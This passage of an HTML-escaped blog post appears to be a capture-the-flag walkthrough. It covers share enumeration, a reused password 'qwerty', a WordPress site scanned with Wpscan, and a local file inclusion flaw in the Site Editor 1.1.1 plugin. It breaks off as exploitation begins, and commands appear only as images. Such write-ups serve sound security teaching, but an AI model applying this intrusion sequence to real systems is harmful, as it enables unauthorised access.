style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEib2zX1A_yZQjTV_W6JiTf3tK_9QfMVyPY50DHc75YH_E2P6Rf90LNREje-eWHjktUvGYCzpLof1u7Z9aqR0hpCkbDQsYir38AV4V-We6xDT7MTRcsEy6vbX3zK5FnTdd1EBUVxEdiKouFGU0zOqcrhvI9tH6X1fKlufDBQRVFTFOgRRibwQoy8hKpAIA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;314&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEib2zX1A_yZQjTV_W6JiTf3tK_9QfMVyPY50DHc75YH_E2P6Rf90LNREje-eWHjktUvGYCzpLof1u7Z9aqR0hpCkbDQsYir38AV4V-We6xDT7MTRcsEy6vbX3zK5FnTdd1EBUVxEdiKouFGU0zOqcrhvI9tH6X1fKlufDBQRVFTFOgRRibwQoy8hKpAIA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgBAktodtivUFGV3ISqGTwuZrFYzlKHw1IF7Ta-cjoomIYRgQ-aZwhddk6zymjBoeJXC_rPM07D15t8ZwQcatYdXPDQ6S3qtY7rQHjC1B4Gy9ZVEdzTlo-14Ujewy1exyaDbEmDVbSmLmf-dXi_UR-gLGubEVVCtGiyOjIh2TA9Eg4JoSG6ZeZjKkJ7lQ&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;590&quot; data-original-width=&quot;775&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgBAktodtivUFGV3ISqGTwuZrFYzlKHw1IF7Ta-cjoomIYRgQ-aZwhddk6zymjBoeJXC_rPM07D15t8ZwQcatYdXPDQ6S3qtY7rQHjC1B4Gy9ZVEdzTlo-14Ujewy1exyaDbEmDVbSmLmf-dXi_UR-gLGubEVVCtGiyOjIh2TA9Eg4JoSG6ZeZjKkJ7lQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- So there is one&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;user named&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;helios&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; and two&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;shared folders named&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;helios&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; and &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;anonymous.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Accessing to &lt;b&gt;anonymous&lt;/b&gt; and getting file &lt;b&gt;attention.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBBjVY7X4UXmz9aRoFtM3G087AZnge0SwNWpKDZoF-VzFHoJC6sQEO7lca5Vy64bZV0o1d9_w7yVV9m6VfeEumi7nVMPppNh1hJaa1gwrV_TaYGUe2YeBZg7B4AubAhgs0dulwFqLRWgyveopAcYEp3laHEATQ9mw9d182j6p5JbfUq3CrJ7mxWc5YMg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;278&quot; data-original-width=&quot;866&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBBjVY7X4UXmz9aRoFtM3G087AZnge0SwNWpKDZoF-VzFHoJC6sQEO7lca5Vy64bZV0o1d9_w7yVV9m6VfeEumi7nVMPppNh1hJaa1gwrV_TaYGUe2YeBZg7B4AubAhgs0dulwFqLRWgyveopAcYEp3laHEATQ9mw9d182j6p5JbfUq3CrJ7mxWc5YMg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;attention.txt&lt;/b&gt; we discover 3 potential passwords:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh05qTIdzkaS8X8r6Sq8pP-6oQcg-fl9NnkO-N2L4v9sAcHKAS1b88CSHsFT6U0LRISUE_6e36pgLfUVv67KtAyQi0xebNrvNlMcaE-DDZUcAXzmdlA8cJfP1wK0dr6ft56spiuR99-DxgrLtebM5rfzc4HC_91Gt2y3nlNv1gdjYcU-U-0S2tN8DxUFg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;191&quot; data-original-width=&quot;879&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh05qTIdzkaS8X8r6Sq8pP-6oQcg-fl9NnkO-N2L4v9sAcHKAS1b88CSHsFT6U0LRISUE_6e36pgLfUVv67KtAyQi0xebNrvNlMcaE-DDZUcAXzmdlA8cJfP1wK0dr6ft56spiuR99-DxgrLtebM5rfzc4HC_91Gt2y3nlNv1gdjYcU-U-0S2tN8DxUFg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The 2nd password &lt;b&gt;qwerty&lt;/b&gt; allows access for user&lt;b&gt; helios&lt;/b&gt; to shared folder &lt;b&gt;helios,&amp;nbsp;&lt;/b&gt;where there are two files &lt;b&gt;research.txt&lt;/b&gt; and &lt;b&gt;todo.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQApjSBwskFtfy5ARkkxRvTp7YImkSbQ1Ojsvac-k6on2jaVgOoolru3ZPgKXM6qrYsBBapiGd6R8bCxsiZ5w4UHkLxgCDngcOjTMIkVH4il7VeZ2aVwSoy7THGEIeWvXjDiUbYFNvJBJ9QfPgpFXLVcwO6obi86msQotSTuv75Kv02IC97tKgu2eIuA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;350&quot; data-original-width=&quot;842&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQApjSBwskFtfy5ARkkxRvTp7YImkSbQ1Ojsvac-k6on2jaVgOoolru3ZPgKXM6qrYsBBapiGd6R8bCxsiZ5w4UHkLxgCDngcOjTMIkVH4il7VeZ2aVwSoy7THGEIeWvXjDiUbYFNvJBJ9QfPgpFXLVcwO6obi86msQotSTuv75Kv02IC97tKgu2eIuA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;research.txt&lt;/b&gt; and &lt;b&gt;todo.txt&lt;/b&gt;, we will focus our attention on folder &lt;b&gt;/h3l105&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGtmX2E3DC6ImknFvCQtL8lHqMOpf4jjmyN4wMppfjWsAlMt8RYEg6wlXKYWPvbPsqnBabzdjY5j23CsV_zOeUxua2iAiOk4k9LWWvKTq7H_42sZAqrUqjmqj00IxwZP2-HzkWtCJfqdKP4VvcQcQLo05_lLO0yq7CG40d9s7BpwwAsiX_VaVqBpZFjw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;279&quot; data-original-width=&quot;483&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGtmX2E3DC6ImknFvCQtL8lHqMOpf4jjmyN4wMppfjWsAlMt8RYEg6wlXKYWPvbPsqnBabzdjY5j23CsV_zOeUxua2iAiOk4k9LWWvKTq7H_42sZAqrUqjmqj00IxwZP2-HzkWtCJfqdKP4VvcQcQLo05_lLO0yq7CG40d9s7BpwwAsiX_VaVqBpZFjw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisKjRVQt-EzuXcruoEvRwV6d_5hePPIwbdMoNvT4Zxb0RZBYzpJhnkE73yrORJHuhqtfTP-z8Ae9pWV7z8PavU4bXMySCkJSCjspO8aG2azwpAmnimzMutvLQWh2KmfbuF3GP3qDqhswPJQ3yDBzfC5eOAUXI4_rGDciVPBDb4ig0zxW4tlw5fDnRs5g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;583&quot; data-original-width=&quot;614&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEisKjRVQt-EzuXcruoEvRwV6d_5hePPIwbdMoNvT4Zxb0RZBYzpJhnkE73yrORJHuhqtfTP-z8Ae9pWV7z8PavU4bXMySCkJSCjspO8aG2azwpAmnimzMutvLQWh2KmfbuF3GP3qDqhswPJQ3yDBzfC5eOAUXI4_rGDciVPBDb4ig0zxW4tlw5fDnRs5g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Going to &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;/h3l105&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; we find a &lt;b&gt;Wordpress&lt;/b&gt; site:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhHuFIHFs2sNeZDMqlrDb1_GE_uqxgmjtVyJHYAVpNbyzgNSqi_EC1rwH5fZjHu5ootnzsJbNwd14AbzacehH0PLBV4aP5mzo2SRrIQjOHhRKW_UVXUcri3zT0mHWVtVjwcrvyG9_dBpF6Xg0rHnkuUhi-VgQHSmFGCG-M0SrAvdIUprzy4Uk8mB-tOfg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;565&quot; data-original-width=&quot;528&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhHuFIHFs2sNeZDMqlrDb1_GE_uqxgmjtVyJHYAVpNbyzgNSqi_EC1rwH5fZjHu5ootnzsJbNwd14AbzacehH0PLBV4aP5mzo2SRrIQjOHhRKW_UVXUcri3zT0mHWVtVjwcrvyG9_dBpF6Xg0rHnkuUhi-VgQHSmFGCG-M0SrAvdIUprzy4Uk8mB-tOfg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning the site with &lt;b&gt;Wpscan &lt;/b&gt;we find a folder&lt;b&gt; /uploads:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2iGTVjWV75E4gp1H9zx5JrdTMGhA1765AcUvOtwq8gnEfynbGI4WraeN7b2o5MNWOmbTNJCJIfTHc526CW1fH9-6ef2uKJzsmDltRsLBt7pIGILDiOV1ouS4lCN1viPFNiGvb66aJJktDRkhvnhmhy7bNI9zj5uBtuXsbxxZX-DyrdfAyd16qtaNLoQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;791&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2iGTVjWV75E4gp1H9zx5JrdTMGhA1765AcUvOtwq8gnEfynbGI4WraeN7b2o5MNWOmbTNJCJIfTHc526CW1fH9-6ef2uKJzsmDltRsLBt7pIGILDiOV1ouS4lCN1viPFNiGvb66aJJktDRkhvnhmhy7bNI9zj5uBtuXsbxxZX-DyrdfAyd16qtaNLoQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEifEwXpcR4_aR-WxLVW1O24DRc6UkzR8-GiFZDHWcN17JPYgcssWoQ8l8IbrspKTJ1-DD_SPpeoXvArajnYXMCpx1QFtKVStw6EvxWdDirDcy_egeivXA69Bu8LpAet9pnmpzCl4Ov_oN9kxOnS0VAUfKnZ12p0w6nEk4r4PsFaB4W9fsxISgQOy5TPlQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;80&quot; data-original-width=&quot;991&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEifEwXpcR4_aR-WxLVW1O24DRc6UkzR8-GiFZDHWcN17JPYgcssWoQ8l8IbrspKTJ1-DD_SPpeoXvArajnYXMCpx1QFtKVStw6EvxWdDirDcy_egeivXA69Bu8LpAet9pnmpzCl4Ov_oN9kxOnS0VAUfKnZ12p0w6nEk4r4PsFaB4W9fsxISgQOy5TPlQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/uploads&lt;/b&gt; there is &lt;b&gt;siteeditor&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgviIaIkdsE8XB7QBWnWKz6d0zOhpPeIQCK4T16QMXDlfWAzDD07hzK_sd7IjQrgqiOkjOk6igw9wue6dtR_-9Ko_r2q1AmEnt3V9ulXa2IJXmTz80thBpYH6gw3T0YsKYsx26rISIISvFaox7LgdB0LuL97lpAEHT5bOLJ3g6JlRc_vQStvTeti7M0EA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;381&quot; data-original-width=&quot;492&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgviIaIkdsE8XB7QBWnWKz6d0zOhpPeIQCK4T16QMXDlfWAzDD07hzK_sd7IjQrgqiOkjOk6igw9wue6dtR_-9Ko_r2q1AmEnt3V9ulXa2IJXmTz80thBpYH6gw3T0YsKYsx26rISIISvFaox7LgdB0LuL97lpAEHT5bOLJ3g6JlRc_vQStvTeti7M0EA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Site Editor 1.1.1&lt;/b&gt; is a Wordpress plugin vulnerable to a &lt;b&gt;LFI&lt;/b&gt; exploit:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg19mVkdSkSVfcGrT1Te72yWKSBlTFTLQLFRbhJSMK7rfEfq3_zpsVM_35RQbyAOAA1TK2sqjX7Tsb7URge4ixvqEfRnvcMTXT9gkkcG8uOetVhCwshZ-rw_sAELIpXWSiM5jNCp36n5CNevYdm4Plr0LIGUsiQjnDVQpQ1vUHfHWNNwzWwXhAQ2zMwpw&quot; style=&quot;clear: left; float: left; 